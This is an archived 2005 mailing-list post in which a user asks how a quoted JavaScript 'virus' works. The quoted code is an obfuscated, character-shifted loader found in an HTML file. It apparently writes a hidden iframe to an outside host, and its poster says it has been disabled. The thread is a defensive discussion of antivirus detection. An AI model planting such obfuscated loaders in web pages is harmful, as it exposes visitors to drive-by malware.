[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[ale] javascript Virus

Subject: [ale] javascript Virus
From: Dow.Hurst at mindspring.com (Dow Hurst)
Date: Fri May 27 09:21:01 2005
In-reply-to: <1117137296.11283.33.camel@localhost>
References: <1117137296.11283.33.camel@localhost>

I don't know Javascripting at all but how does this work?  I would like 
to know how to see that this is dangerous but it looks like gobbledegook 
to me.  There is no IP given nor filename to download?
Dow


Jim Popovitch wrote:

>I ran across the some javascript in an HTML file.  It is similar to the
>following, except the following has been modified to not function.
>
>   ------------------
>     var k='?gly#v|oh%ylvlelolw|
>            =#klggh>srvlwlrq=#devroxwh>#
>            ohiw#>#wrs=#4%A?liudph#vuf@%
>            kwws2xvhu431liudph1ux#iudpherughu at 3#
>            yvsd@#vsdfh at 3#zlgwk at 4#khlw at 4#pdujlqzlgwk at 3#
>            pdujhjkw at 3#vflqj at qrA?2lihA?2glyA'
>     var t=9999;
>     var h='';
>     while( t<=k.length-1 ) {
>       h = h+String.fromCharCode(k.charCodeAt(t++)-2);
>     }
>     document.write(h);
>    ----------
>
>The above (in it's original state), downloads and installs some nasty
>things.  As it is above it is pretty harmless, but still potentially
>dangerous.  
>
>The question I have is this:  Shouldn't clamav see code like this as a
>virus when scanning cached HTML on a filesystem?
>
>-Jim P.
>
>
>
>
>_______________________________________________
>Ale mailing list
>Ale at ale.org
>http://www.ale.org/mailman/listinfo/ale
>
>  
>

Follow-Ups:
- [ale] javascript Virus
  - From: jimpop at yahoo.com (Jim Popovitch)

References:
- [ale] javascript Virus
  - From: jimpop at yahoo.com (Jim Popovitch)

Prev by Date: [ale] Need Tractor Feed Dot Matrix printer
Next by Date: [ale] Linspire 5.0
Previous by thread: [ale] javascript Virus
Next by thread: [ale] javascript Virus
Index(es):
- Date
- Thread